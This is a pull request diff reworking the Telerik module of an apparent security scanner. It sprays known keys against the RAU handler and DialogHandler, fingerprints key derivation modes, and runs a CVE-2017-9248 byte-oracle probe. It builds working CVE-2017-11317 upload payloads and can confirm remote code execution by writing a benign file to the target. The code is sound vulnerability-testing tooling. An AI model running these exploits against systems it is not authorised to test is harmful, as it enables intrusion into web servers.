### PR TITLE
telerik: overhaul, native RAU + DialogHandler crypto

### DIFF
--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -644,6 +644,9 @@ class telerik(BaseModule):
 
     @staticmethod
     def _classify_kdf_response(text):
+        # "Invalid length for a Base-64" comes from an input-length gate that fires before
+        # any crypto happens — it tells us nothing about KDF or patch status. Only the
+        # crypto-layer error strings actually classify the derivation mode.
         if (
             "Exception of type 'System.Exception' was thrown" in text
             or "The cryptographic operation has failed!" in text
@@ -651,8 +654,6 @@ class telerik(BaseModule):
             return "PBKDF2"
         if "Length cannot be less than zero" in text:
             return "PBKDF1_MS"
-        if "Invalid length for a Base-64 char array or string" in text:
-            return "PATCHED"
         return None
 
     async def _probe_dialoghandler_oracle(self, dh_url, event):

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -167,9 +167,13 @@ class telerik(BaseModule):
     ]
 
     class Config(BaseModuleConfig):
-        exploit_rau: bool = Field(
+        rau_confirm_version: bool = Field(
             False,
-            description="Attempt to confirm RAU RCE with default keys. Uploads a benign file if successful.",
+            description=(
+                "WARNING: writes a benign 1-byte file to the target's C:\\Windows\\Temp\\ on success. "
+                "Iterates candidate Telerik versions with default keys; the version that uploads is "
+                "the installed one, which also confirms RCE."
+            ),
         )
         include_subdirs: bool = Field(
             False,
@@ -293,7 +297,7 @@ class telerik(BaseModule):
         # so a hit proves the crypto works without persisting anything on the target.
         await self._probe_rau_default_keys(url, event)
 
-        if self.config.get("exploit_rau") and base_url not in self._rau_confirmed:
+        if self.config.get("rau_confirm_version") and base_url not in self._rau_confirmed:
             self._rau_confirmed.add(base_url)
             await self._confirm_rau_knownkey(url, event, base_url)
 
@@ -334,7 +338,7 @@ class telerik(BaseModule):
         """
         Version-identification + exploit. Iterate real Telerik versions with default keys;
         the one producing `{"fileInfo":` also uploads the benign 1-byte probe file to the
-        target's C:\\Windows\\Temp\\. Only runs when exploit_rau=True.
+        target's C:\\Windows\\Temp\\. Only runs when rau_confirm_version=True.
         """
         for version in self.telerik_versions:
             if int(version[:4]) <= 2017 or version == "2018.1.117":

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -1,5 +1,8 @@
 import base64
 import itertools
+import re
+from pathlib import Path
+from typing import Optional
 
 from Crypto.Cipher import AES
 from badsecrets import modules_loaded
@@ -43,48 +46,49 @@ class telerik(BaseModule):
         "author": "@liquidsec",
     }
 
-    telerik_versions = [
-        "2007.1423",
-        "2007.1521",
-        "2007.1626",
-        "2007.2918",
-        "2007.21010",
-        "2007.21107",
-        "2007.31218",
-        "2007.31314",
-        "2007.31425",
-        "2008.1415",
-        "2008.1515",
-        "2008.1619",
-        "2008.2723",
-        "2008.2826",
-        "2008.21001",
-        "2008.31105",
-        "2008.31125",
-        "2008.31314",
-        "2009.1311",
-        "2009.1402",
-        "2009.1527",
-        "2009.2701",
-        "2009.2826",
-        "2009.31103",
-        "2009.31208",
-        "2009.31314",
-        "2010.1309",
-        "2010.1415",
-        "2010.1519",
-        "2010.2713",
-        "2010.2826",
-        "2010.2929",
-        "2010.31109",
-        "2010.31215",
-        "2010.31317",
-        "2011.1315",
-        "2011.1413",
-        "2011.1519",
-        "2011.2712",
-        "2011.2915",
-        "2011.31115",
+    # Pre-CVE-2017-11317 (Telerik shipped default keys until R2 2017 SP2 / 2017.2.711).
+    _TELERIK_VERSIONS_PREPATCH = [
+        "2007.1.423",
+        "2007.1.521",
+        "2007.1.626",
+        "2007.2.918",
+        "2007.2.1010",
+        "2007.2.1107",
+        "2007.3.1218",
+        "2007.3.1314",
+        "2007.3.1425",
+        "2008.1.415",
+        "2008.1.515",
+        "2008.1.619",
+        "2008.2.723",
+        "2008.2.826",
+        "2008.2.1001",
+        "2008.3.1105",
+        "2008.3.1125",
+        "2008.3.1314",
+        "2009.1.311",
+        "2009.1.402",
+        "2009.1.527",
+        "2009.2.701",
+        "2009.2.826",
+        "2009.3.1103",
+        "2009.3.1208",
+        "2009.3.1314",
+        "2010.1.309",
+        "2010.1.415",
+        "2010.1.519",
+        "2010.2.713",
+        "2010.2.826",
+        "2010.2.929",
+        "2010.3.1109",
+        "2010.3.1215",
+        "2010.3.1317",
+        "2011.1.315",
+        "2011.1.413",
+        "2011.1.519",
+        "2011.2.712",
+        "2011.2.915",
+        "2011.3.1115",
         "2011.3.1305",
         "2012.1.215",
         "2012.1.411",
@@ -109,6 +113,7 @@ class telerik(BaseModule):
         "2014.3.1024",
         "2015.1.204",
         "2015.1.225",
+        "2015.1.401",
         "2015.2.604",
         "2015.2.623",
         "2015.2.729",
@@ -117,12 +122,12 @@ class telerik(BaseModule):
         "2015.3.1111",
         "2016.1.113",
         "2016.1.225",
+        "2016.1.1213",
         "2016.2.504",
         "2016.2.607",
         "2016.3.914",
         "2016.3.1018",
         "2016.3.1027",
-        "2016.1.1213",
         "2017.1.118",
         "2017.1.228",
         "2017.2.503",
@@ -130,6 +135,80 @@ class telerik(BaseModule):
         "2017.2.711",
         "2017.3.913",
     ]
+
+    # Post-patch versions still show up with placeholder default keys in real deployments
+    # (admins who copy web.config example values without regenerating). 2018.1.117 is the
+    # last PBKDF1_MS release before the switch to PBKDF2.
+    _TELERIK_VERSIONS_PATCHED = [
+        "2018.1.117",
+        "2018.2.516",
+        "2018.2.710",
+        "2018.3.910",
+        "2019.1.115",
+        "2019.1.215",
+        "2019.2.514",
+        "2019.3.917",
+        "2019.3.1023",
+        "2020.1.114",
+        "2020.1.219",
+        "2020.2.512",
+        "2020.2.617",
+        "2020.3.915",
+        "2020.3.1021",
+        "2021.1.119",
+        "2021.1.224",
+        "2021.1.330",
+        "2021.2.511",
+        "2021.2.616",
+        "2021.3.914",
+        "2021.3.1111",
+        "2022.1.119",
+        "2022.1.302",
+        "2022.2.511",
+        "2022.2.622",
+        "2022.3.913",
+        "2022.3.921",
+        "2022.3.1109",
+        "2023.1.117",
+        "2023.1.314",
+        "2023.1.323",
+        "2023.1.425",
+        "2023.2.606",
+        "2023.2.718",
+        "2023.2.829",
+        "2023.3.1010",
+        "2023.3.1114",
+        "2024.1.130",
+        "2024.1.312",
+        "2024.1.319",
+        "2024.2.513",
+        "2024.2.514",
+        "2024.3.806",
+        "2024.3.924",
+        "2024.3.1015",
+        "2024.4.1112",
+        "2024.4.1113",
+        "2024.4.1114",
+        "2025.1.211",
+        "2025.1.218",
+        "2025.1.416",
+        "2025.2.520",
+        "2025.2.528",
+        "2025.2.609",
+        "2025.3.812",
+        "2025.3.825",
+    ]
+
+    # Combined pre-patch + patched + undotted variants of pre-patch. Telerik shipped some
+    # early releases with an undotted revision (2011.3.1115 also appeared as 2011.31115), so
+    # both formats have to be tried when the target's actual manifest is unknown.
+    telerik_versions = list(
+        dict.fromkeys(
+            _TELERIK_VERSIONS_PREPATCH
+            + _TELERIK_VERSIONS_PATCHED
+            + [re.sub(r"\.(?=\d+$)", "", v) for v in _TELERIK_VERSIONS_PREPATCH]
+        )
+    )
 
     dialoghandler_urls = [
         "Telerik.Web.UI.DialogHandler.aspx",
@@ -170,7 +249,7 @@ class telerik(BaseModule):
         rau_confirm_version: bool = Field(
             False,
             description=(
-                "WARNING: writes a benign 1-byte file to the target's C:\\Windows\\Temp\\ on success. "
+                "WARNING: writes a benign 1-byte file to the target's C:\\windows\\temp\\ on success. "
                 "Iterates candidate Telerik versions with default keys; the version that uploads is "
                 "the installed one, which also confirms RCE."
             ),
@@ -191,6 +270,10 @@ class telerik(BaseModule):
             False,
             description="Also spray ASP.NET machineKey values (thousands of keys, much slower).",
         )
+        custom_secrets: Optional[str] = Field(
+            None,
+            description="Path to a file with additional Telerik hash/encryption keys to spray, one per line.",
+        )
 
     in_scope_only = True
 
@@ -200,8 +283,15 @@ class telerik(BaseModule):
 
     async def setup(self):
         self._rau_confirmed = set()
-        self._enc = Telerik_EncryptionKey()
-        self._hash = Telerik_HashKey()
+        custom_secrets = self.config.get("custom_secrets", None)
+        if custom_secrets:
+            path = Path(custom_secrets).expanduser()
+            if not path.is_file():
+                return False, f"custom_secrets file [{custom_secrets}] not found"
+            self.info(f"Loaded custom Telerik key list from [{custom_secrets}]")
+            custom_secrets = str(path)
+        self._enc = Telerik_EncryptionKey(custom_resource=custom_secrets)
+        self._hash = Telerik_HashKey(custom_resource=custom_secrets)
         return True
 
     @staticmethod
@@ -241,14 +331,21 @@ class telerik(BaseModule):
         """
         kdf_mode = None
         if self.config.get("try_known_keys"):
+            self.verbose(f"Fingerprinting DialogHandler KDF mode at {dh_url}")
             kdf_mode = await self._detect_kdf_mode(dh_url)
+            self.verbose(f"DialogHandler KDF mode: [{kdf_mode}]")
             if kdf_mode in ("PBKDF1_MS", "PBKDF2"):
+                self.verbose(f"Spraying known keys against DialogHandler ({kdf_mode})")
                 if await self._probe_dialoghandler_knownkey(dh_url, event, kdf_mode):
                     return
+                self.verbose("Known-key spray exhausted, no match")
         if self.config.get("probe_dialoghandler_oracle"):
             if kdf_mode is None:
+                self.verbose(f"Fingerprinting DialogHandler KDF mode at {dh_url}")
                 kdf_mode = await self._detect_kdf_mode(dh_url)
+                self.verbose(f"DialogHandler KDF mode: [{kdf_mode}]")
             if kdf_mode == "PBKDF1_MS":
+                self.verbose("Running dp_cryptomg find_baseline byte-oracle probe (up to 81 requests)")
                 await self._probe_dialoghandler_oracle(dh_url, event)
 
     def _base_url(self, event):
@@ -293,70 +390,128 @@ class telerik(BaseModule):
             context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik RAU Handler",
         )
 
-        # Safe probe: fake-version payload with default keys. Assembly load fails before file write,
-        # so a hit proves the crypto works without persisting anything on the target.
-        await self._probe_rau_default_keys(url, event)
-
-        if self.config.get("rau_confirm_version") and base_url not in self._rau_confirmed:
-            self._rau_confirmed.add(base_url)
-            await self._confirm_rau_knownkey(url, event, base_url)
-
-    async def _probe_rau_default_keys(self, url, event):
-        """
-        Send fake-version payloads with default keys across each (KDF, HMAC) variant.
-        Response `Could not load file or assembly` = crypto succeeded, .NET failed to load
-        the bogus assembly type -> default keys accepted, no file uploaded.
-        """
-        for kdf_mode, include_hmac in self._RAU_PROBE_VARIANTS:
-            payload = self._build_rau_multipart(
-                self._RAU_FAKE_VERSION, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY, kdf_mode, include_hmac
-            )
-            response = await self.helpers.request(url, method="POST", files=payload)
-            if not response or "Could not load file or assembly" not in response.text:
-                continue
-            self.debug(f"RAU default keys accepted (KDF={kdf_mode}, HMAC={include_hmac})")
-            await self.emit_event(
-                {
-                    "host": str(event.host),
-                    "url": url,
-                    "description": (
-                        f"Telerik RAU accepts default keys (KDF={kdf_mode}, HMAC={include_hmac}). "
-                        "RCE is achievable once the exact installed Telerik version is identified; "
-                        "no file was uploaded by this probe."
-                    ),
-                    "name": "Telerik RAU Default Keys Accepted (CVE-2017-11317)",
-                    "severity": "HIGH",
-                    "confidence": "HIGH",
-                },
-                "FINDING",
-                event,
-                context=f"{{module}} confirmed default RAU keys at {url} without uploading",
-            )
+        # Safe probe: fake-version payloads with each candidate key pair. Assembly load fails
+        # before any file write, so a hit proves keys+crypto work without persisting anything.
+        self.verbose(f"Probing RAU for known keys with fake version {self._RAU_FAKE_VERSION} (no upload)")
+        key_material = await self._probe_rau_known_keys(url)
+        if key_material is None:
+            self.verbose(f"RAU key spray exhausted, no known keys accepted at {url}")
             return
 
-    async def _confirm_rau_knownkey(self, url, event, base_url):
-        """
-        Version-identification + exploit. Iterate real Telerik versions with default keys;
-        the one producing `{"fileInfo":` also uploads the benign 1-byte probe file to the
-        target's C:\\Windows\\Temp\\. Only runs when rau_confirm_version=True.
-        """
-        for version in self.telerik_versions:
-            if int(version[:4]) <= 2017 or version == "2018.1.117":
-                kdf_mode = "PBKDF1_MS"
-            else:
-                kdf_mode = "PBKDF2"
-            include_hmac = int(version[:4]) >= 2017
-            payload = self._build_rau_multipart(
-                version, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY, kdf_mode, include_hmac
+        kdf_mode, include_hmac, hash_key, enc_key = key_material
+        self.verbose(
+            f"RAU accepted key pair (KDF={kdf_mode}, HMAC={include_hmac}) — hash=[{hash_key}] enc=[{enc_key}]"
+        )
+
+        if not self.config.get("rau_confirm_version"):
+            self.verbose("rau_confirm_version disabled; emitting HIGH finding without version identification")
+            await self._emit_rau_keys_accepted(url, event, key_material, version_attempted=False)
+            return
+
+        if base_url in self._rau_confirmed:
+            return
+        self._rau_confirmed.add(base_url)
+
+        self.verbose(
+            f"rau_confirm_version enabled; iterating {len(self.telerik_versions)} candidate versions "
+            "to identify installed one (this will upload a 1-byte file on match)"
+        )
+        if not await self._confirm_rau_version(url, event, base_url, key_material):
+            # Version identification failed with these keys; fall back to the HIGH finding
+            # so the user still learns keys are accepted.
+            self.verbose(
+                "Version Detection Failed (target version not in candidate list); emitting HIGH keys-accepted finding"
             )
+            await self._emit_rau_keys_accepted(url, event, key_material, version_attempted=True)
+
+    def _iter_rau_key_pairs(self):
+        """
+        Yield (hash_key, enc_key) candidates for the RAU handler. The labeled RAU defaults
+        come first (most common), then the full badsecrets keylists if try_known_keys is on.
+        Duplicates are suppressed.
+        """
+        yield (RAU_DEFAULT_HASH_KEY, RAU_DEFAULT_ENC_KEY)
+        if not self.config.get("try_known_keys"):
+            return
+        include_machinekeys = self.config.get("include_machinekeys", False)
+        seen = {(RAU_DEFAULT_HASH_KEY, RAU_DEFAULT_ENC_KEY)}
+        hash_keys = list(self._hash.prepare_keylist(include_machinekeys=include_machinekeys))
+        enc_keys = list(self._enc.prepare_keylist(include_machinekeys=include_machinekeys))
+        for hk in hash_keys:
+            for ek in enc_keys:
+                pair = (hk, ek)
+                if pair in seen:
+                    continue
+                seen.add(pair)
+                yield pair
+
+    async def _probe_rau_known_keys(self, url):
+        """
+        For each (KDF, HMAC) variant × (hash_key, enc_key) pair, POST a fake-version payload.
+        `Could not load file or assembly` in the response means crypto worked and .NET rejected
+        the bogus version before touching the file write path. Returns the discovered
+        (kdf_mode, include_hmac, hash_key, enc_key) or None. Does not emit.
+        """
+        for kdf_mode, include_hmac in self._RAU_PROBE_VARIANTS:
+            for hash_key, enc_key in self._iter_rau_key_pairs():
+                payload = self._build_rau_multipart(self._RAU_FAKE_VERSION, enc_key, hash_key, kdf_mode, include_hmac)
+                response = await self.helpers.request(url, method="POST", files=payload)
+                if response and "Could not load file or assembly" in response.text:
+                    self.debug(
+                        f"RAU accepts key pair enc=[{enc_key}] hash=[{hash_key}] (KDF={kdf_mode}, HMAC={include_hmac})"
+                    )
+                    return (kdf_mode, include_hmac, hash_key, enc_key)
+        return None
+
+    async def _emit_rau_keys_accepted(self, url, event, key_material, version_attempted):
+        kdf_mode, include_hmac, hash_key, enc_key = key_material
+        is_default = (hash_key, enc_key) == (RAU_DEFAULT_HASH_KEY, RAU_DEFAULT_ENC_KEY)
+        key_label = "Default" if is_default else "Known"
+        version_note = (
+            "Version detection was attempted but failed — target's installed Telerik version is not in the candidate list."
+            if version_attempted
+            else "Version detection was not executed."
+        )
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": url,
+                "description": (
+                    f"Telerik RAU accepts a {key_label.lower()} key pair. "
+                    f"Hash key: [{hash_key}] Encryption key: [{enc_key}] "
+                    f"KDF: [{kdf_mode}] HMAC: [{include_hmac}]. {version_note}"
+                ),
+                "name": f"Telerik RAU {key_label} Keys Accepted (CVE-2017-11317)",
+                "severity": "HIGH",
+                "confidence": "HIGH",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} confirmed RAU key acceptance at {url} without uploading",
+        )
+
+    async def _confirm_rau_version(self, url, event, base_url, key_material):
+        """
+        Version identification + RCE confirmation. Iterate Telerik versions with the KEY
+        MATERIAL already proven by the safe probe; the first version producing `fileInfo`
+        also uploads the benign 1-byte probe file to the target's C:\\windows\\temp\\.
+        Returns True if a version was matched (and the CRITICAL finding emitted).
+        """
+        kdf_mode, include_hmac, hash_key, enc_key = key_material
+        for version in self.telerik_versions:
+            payload = self._build_rau_multipart(version, enc_key, hash_key, kdf_mode, include_hmac)
             response = await self.helpers.request(url, method="POST", files=payload)
             if response and '"fileInfo":' in response.text:
-                self.debug(f"Confirmed RAU RCE (version: {version})")
+                self.verbose(f"RAU RCE confirmed on version {version}; benign file was uploaded to target")
                 await self.emit_event(
                     {
                         "host": str(event.host),
                         "url": url,
-                        "description": f"Confirmed Telerik RAU RCE (version: {version}, key: default)",
+                        "description": (
+                            f"Confirmed Telerik RAU RCE. Version: [{version}] "
+                            f"Hash key: [{hash_key}] Encryption key: [{enc_key}] "
+                            f"KDF: [{kdf_mode}] HMAC: [{include_hmac}]"
+                        ),
                         "name": "Telerik RAU RCE (CVE-2017-11317)",
                         "severity": "CRITICAL",
                         "confidence": "CONFIRMED",
@@ -365,7 +520,8 @@ class telerik(BaseModule):
                     event,
                     context=f"{{module}} confirmed {{event.type}}: Telerik RAU RCE at {base_url}",
                 )
-                return
+                return True
+        return False
 
     def _rau_encrypt(self, plaintext, key, iv):
         """AES-256-CBC with the null-byte-interleaved plaintext encoding Telerik RAU uses."""
@@ -391,7 +547,7 @@ class telerik(BaseModule):
             key, iv = self._enc.telerik_derivekeys_PBKDF2(enc_key)
 
         enc_target_folder = self._rau_sign(self._rau_encrypt("", key, iv), hash_key, include_hmac)
-        enc_temp_folder = self._rau_sign(self._rau_encrypt("C:\\Windows\\Temp\\", key, iv), hash_key, include_hmac)
+        enc_temp_folder = self._rau_sign(self._rau_encrypt("C:\\windows\\temp\\", key, iv), hash_key, include_hmac)
         rau_post_data_json = (
             f'{{"TargetFolder":"{enc_target_folder}",'
             f'"TempTargetFolder":"{enc_temp_folder}",'
@@ -402,7 +558,7 @@ class telerik(BaseModule):
             '"UseApplicationPoolImpersonation":false}'
         )
         assembly_type = (
-            f"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version={assembly_version}, "
+            f'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version="{assembly_version}", '
             "Culture=neutral, PublicKeyToken=121fae78165ba3d4"
         )
         rau_post_data = f"{self._rau_encrypt(rau_post_data_json, key, iv)}&{self._rau_encrypt(assembly_type, key, iv)}"
@@ -457,7 +613,7 @@ class telerik(BaseModule):
 
     async def _emit_dialoghandler(self, base_url, dh, event):
         dh_url = f"{base_url}{dh}"
-        self.debug(f"Detected Telerik DialogHandler ({dh})")
+        self.verbose(f"Detected Telerik DialogHandler at {dh_url}")
         await self.emit_event(
             {
                 "host": str(event.host),
@@ -512,7 +668,7 @@ class telerik(BaseModule):
                 "Index was outside the bounds of the array." in text
                 or "String was not recognized as a valid Boolean." in text
             ):
-                self.debug(f"CVE-2017-9248 baseline hit on combo {combo!r}")
+                self.verbose(f"dp_cryptomg baseline probe leaked on 4-byte combo {combo!r}; oracle confirmed")
                 await self.emit_event(
                     {
                         "host": str(event.host),
@@ -575,7 +731,7 @@ class telerik(BaseModule):
             if not response:
                 continue
             if "The input data is not a complete block" in response.text:
-                self.debug(f"Matched Telerik hash key: {hash_key}")
+                self.verbose(f"DialogHandler hash key matched: [{hash_key}]")
                 return hash_key
         return None
 
@@ -588,7 +744,7 @@ class telerik(BaseModule):
             if not response:
                 continue
             if "Index was outside the bounds of the array" in response.text:
-                self.debug(f"Matched Telerik encryption key: {enc_key}")
+                self.verbose(f"DialogHandler encryption key matched: [{enc_key}]")
                 return enc_key
         return None
 
@@ -609,7 +765,7 @@ class telerik(BaseModule):
                 if not response:
                     continue
                 if abs(len(response.text) - baseline_size) > 10:
-                    self.debug(f"Matched Telerik PBKDF2 key pair: {hash_key} / {enc_key}")
+                    self.verbose(f"DialogHandler PBKDF2 key pair matched: hash=[{hash_key}] enc=[{enc_key}]")
                     return hash_key, enc_key
         return None
 

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -1,4 +1,5 @@
 import base64
+import itertools
 
 from Crypto.Cipher import AES
 from badsecrets import modules_loaded
@@ -221,18 +222,30 @@ class telerik(BaseModule):
             await self._probe_rau(base_url, event)
             dh_url = await self._probe_dialoghandler(base_url, event)
             if dh_url:
-                kdf_mode = None
-                if self.config.get("probe_dialoghandler_oracle"):
-                    kdf_mode = await self._probe_dialoghandler_oracle(dh_url, event)
-                if self.config.get("try_known_keys"):
-                    if kdf_mode is None:
-                        kdf_mode = await self._detect_kdf_mode(dh_url)
-                    if kdf_mode in ("PBKDF1_MS", "PBKDF2"):
-                        await self._probe_dialoghandler_knownkey(dh_url, event, kdf_mode)
+                await self._probe_dialoghandler_exploit(dh_url, event)
             await self._probe_spellcheck(base_url, event)
             await self._probe_chartimage(base_url, event)
         elif event.type == "HTTP_RESPONSE":
             await self._carve_http_response(event)
+
+    async def _probe_dialoghandler_exploit(self, dh_url, event):
+        """
+        Known-key spray first (definitive: recovers the actual keys). If nothing matches,
+        fall back to the dp_cryptomg baseline probe (chosen-plaintext byte-oracle test).
+        Oracle only runs on PBKDF1_MS targets; the CVE-2017-9248 patch moved to PBKDF2
+        specifically to defeat this attack, so probing PBKDF2 is wasted requests.
+        """
+        kdf_mode = None
+        if self.config.get("try_known_keys"):
+            kdf_mode = await self._detect_kdf_mode(dh_url)
+            if kdf_mode in ("PBKDF1_MS", "PBKDF2"):
+                if await self._probe_dialoghandler_knownkey(dh_url, event, kdf_mode):
+                    return
+        if self.config.get("probe_dialoghandler_oracle"):
+            if kdf_mode is None:
+                kdf_mode = await self._detect_kdf_mode(dh_url)
+            if kdf_mode == "PBKDF1_MS":
+                await self._probe_dialoghandler_oracle(dh_url, event)
 
     def _base_url(self, event):
         if self.config.get("include_subdirs"):
@@ -365,10 +378,26 @@ class telerik(BaseModule):
     # -----------------------------------------------------------------------
 
     async def _probe_dialoghandler(self, base_url, event):
-        candidates = {f"{base_url}{dh}?dp=1": dh for dh in self.dialoghandler_urls}
+        """
+        Try the default path first (sequential) — DialogHandler is a global handler that
+        responds identically regardless of path, so on a real target the default path
+        almost always works and produces a less confusing finding URL. Only fan out to
+        the extended candidate list if the default doesn't match.
+        """
+        if not self.dialoghandler_urls:
+            return None
+
+        default_dh = self.dialoghandler_urls[0]
+        default_response = await self.helpers.request(f"{base_url}{default_dh}?dp=1", timeout=self.scan.http_timeout)
+        if default_response and "Cannot deserialize dialog parameters" in default_response.text:
+            return await self._emit_dialoghandler(base_url, default_dh, event)
+
+        remaining = {f"{base_url}{dh}?dp=1": dh for dh in self.dialoghandler_urls[1:]}
+        if not remaining:
+            return None
 
         fail_count = 0
-        async for url, response in self.helpers.request_batch_stream(list(candidates)):
+        async for url, response in self.helpers.request_batch_stream(list(remaining)):
             if response is None:
                 fail_count += 1
                 if fail_count < 2:
@@ -377,26 +406,26 @@ class telerik(BaseModule):
                 return None
             if "Cannot deserialize dialog parameters" not in response.text:
                 continue
-            dh = candidates[url]
-            dh_url = f"{base_url}{dh}"
-            self.debug(f"Detected Telerik DialogHandler ({dh})")
-            await self.emit_event(
-                {
-                    "host": str(event.host),
-                    "url": dh_url,
-                    "description": "Telerik DialogHandler detected",
-                    "name": "Telerik DialogHandler",
-                    "confidence": "CONFIRMED",
-                    "severity": "INFO",
-                },
-                "FINDING",
-                event,
-                context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik DialogHandler",
-            )
-            # The generic Telerik.Web.UI.DialogHandler.aspx often matches under a path wildcard on the target;
-            # stop after the first hit to keep noise down.
-            return dh_url
+            return await self._emit_dialoghandler(base_url, remaining[url], event)
         return None
+
+    async def _emit_dialoghandler(self, base_url, dh, event):
+        dh_url = f"{base_url}{dh}"
+        self.debug(f"Detected Telerik DialogHandler ({dh})")
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": dh_url,
+                "description": "Telerik DialogHandler detected",
+                "name": "Telerik DialogHandler",
+                "confidence": "CONFIRMED",
+                "severity": "INFO",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik DialogHandler",
+        )
+        return dh_url
 
     async def _detect_kdf_mode(self, dh_url):
         """Send an empty probe; response error tells us which KDF the target uses."""
@@ -420,46 +449,60 @@ class telerik(BaseModule):
 
     async def _probe_dialoghandler_oracle(self, dh_url, event):
         """
-        CVE-2017-9248 quick_check: pre-patch PBKDF1_MS variants leak the
-        `Length cannot be less than zero` error string, which is the same signal
-        dp_cryptomg uses to confirm the byte-oracle key-recovery attack works.
+        Port of dp_cryptomg's find_baseline(): send crafted GET ?dp=<base64(4 bytes)>
+        payloads iterating combinations of [0x00, 0x6b, 0x08]. A response containing
+        `Index was outside the bounds of the array.` or `String was not recognized as a
+        valid Boolean.` proves the byte-oracle leaks decryption state and CVE-2017-9248
+        byte-by-byte key recovery is feasible against this target.
         """
-        kdf_mode = await self._detect_kdf_mode(dh_url)
-        if kdf_mode == "PBKDF1_MS":
-            await self.emit_event(
-                {
-                    "host": str(event.host),
-                    "url": dh_url,
-                    "description": (
-                        "Telerik DialogHandler exposes CVE-2017-9248 crypto oracle "
-                        "(PBKDF1_MS mode, key recovery viable via dp_cryptomg)"
-                    ),
-                    "name": "Telerik DialogHandler Oracle (CVE-2017-9248)",
-                    "severity": "HIGH",
-                    "confidence": "HIGH",
-                },
-                "FINDING",
-                event,
-                context=f"{{module}} confirmed CVE-2017-9248 crypto oracle at {dh_url}",
-            )
-        return kdf_mode
+        test_bytes = [b"\x00", b"\x6b", b"\x08"]
+        for combo in itertools.product(test_bytes, repeat=4):
+            payload = base64.b64encode(b"".join(combo)).decode()
+            response = await self.helpers.request(f"{dh_url}?dp={payload}", timeout=self.scan.http_timeout)
+            if not response:
+                continue
+            text = response.text
+            if (
+                "Index was outside the bounds of the array." in text
+                or "String was not recognized as a valid Boolean." in text
+            ):
+                self.debug(f"CVE-2017-9248 baseline hit on combo {combo!r}")
+                await self.emit_event(
+                    {
+                        "host": str(event.host),
+                        "url": dh_url,
+                        "description": (
+                            "Telerik DialogHandler is exploitable via CVE-2017-9248 byte-oracle "
+                            "key recovery (baseline probe leaked decryption state)"
+                        ),
+                        "name": "Telerik DialogHandler Oracle (CVE-2017-9248)",
+                        "severity": "CRITICAL",
+                        "confidence": "CONFIRMED",
+                    },
+                    "FINDING",
+                    event,
+                    context=f"{{module}} confirmed CVE-2017-9248 byte-oracle at {dh_url}",
+                )
+                return True
+        return False
 
     async def _probe_dialoghandler_knownkey(self, dh_url, event, kdf_mode):
+        """Returns True if a known key pair was recovered and a finding emitted."""
         include_machinekeys = self.config.get("include_machinekeys", False)
         if kdf_mode == "PBKDF1_MS":
             hash_key = await self._solve_dh_hashkey(dh_url, include_machinekeys)
             if not hash_key:
-                return
+                return False
             enc_key = await self._solve_dh_enckey(dh_url, hash_key, kdf_mode, include_machinekeys)
             if not enc_key:
-                return
+                return False
         elif kdf_mode == "PBKDF2":
             match = await self._solve_dh_pbkdf2_combined(dh_url, include_machinekeys)
             if not match:
-                return
+                return False
             hash_key, enc_key = match
         else:
-            return
+            return False
 
         await self.emit_event(
             {
@@ -477,6 +520,7 @@ class telerik(BaseModule):
             event,
             context=f"{{module}} recovered a known Telerik key pair at {dh_url}",
         )
+        return True
 
     async def _solve_dh_hashkey(self, dh_url, include_machinekeys):
         """PBKDF1_MS mode: hashkey solves independently via 'input data is not a complete block' oracle."""

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -256,6 +256,17 @@ class telerik(BaseModule):
     # RAU (CVE-2017-11317)
     # -----------------------------------------------------------------------
 
+    # (KDF mode, HMAC on/off) combinations to try in the safe default-keys probe.
+    # Covers pre-2017 (PBKDF1_MS + no HMAC), the PBKDF1_MS + HMAC window (2017.1.118 - 2018.1.117),
+    # and post-PBKDF2 (2018.2+). Any combo hitting the "Could not load file or assembly" signal
+    # proves the target accepts default keys without triggering a file upload.
+    _RAU_PROBE_VARIANTS = (
+        ("PBKDF1_MS", False),
+        ("PBKDF1_MS", True),
+        ("PBKDF2", True),
+    )
+    _RAU_FAKE_VERSION = "9999.9.999"
+
     async def _probe_rau(self, base_url, event):
         webresource = "Telerik.Web.UI.WebResource.axd?type=rau"
         url = f"{base_url}{webresource}"
@@ -264,13 +275,11 @@ class telerik(BaseModule):
             return
         self.verbose(f"Detected Telerik RAU handler at {url}")
 
-        version, verbose_errors = await self._rau_version_fingerprint(url)
-
         await self.emit_event(
             {
                 "host": str(event.host),
                 "url": url,
-                "description": f"Verbose Errors Enabled: [{verbose_errors}] Version Guess: [{version}]",
+                "description": "Telerik RAU handler detected",
                 "name": "Telerik RAU Handler",
                 "severity": "INFO",
                 "confidence": "HIGH",
@@ -280,29 +289,62 @@ class telerik(BaseModule):
             context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik RAU Handler",
         )
 
+        # Safe probe: fake-version payload with default keys. Assembly load fails before file write,
+        # so a hit proves the crypto works without persisting anything on the target.
+        await self._probe_rau_default_keys(url, event)
+
         if self.config.get("exploit_rau") and base_url not in self._rau_confirmed:
             self._rau_confirmed.add(base_url)
             await self._confirm_rau_knownkey(url, event, base_url)
 
-    async def _rau_version_fingerprint(self, url):
-        """Send a payload built with default keys and read the crypto-error banner in the response."""
-        payload = self._build_rau_multipart("2014.3.1024", RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY)
-        response = await self.helpers.request(url, method="POST", files=payload)
-        if not response:
-            return "unknown", False
-        text = response.text
-        if "Exception Details: " not in text:
-            return "unknown", False
-        if "Telerik.Web.UI.CryptoExceptionThrower.ThrowGenericCryptoException" in text:
-            return "Post-2020 (Encrypt-Then-Mac Enabled, with Generic Crypto Failure Message)", True
-        if "Padding is invalid and cannot be removed" in text:
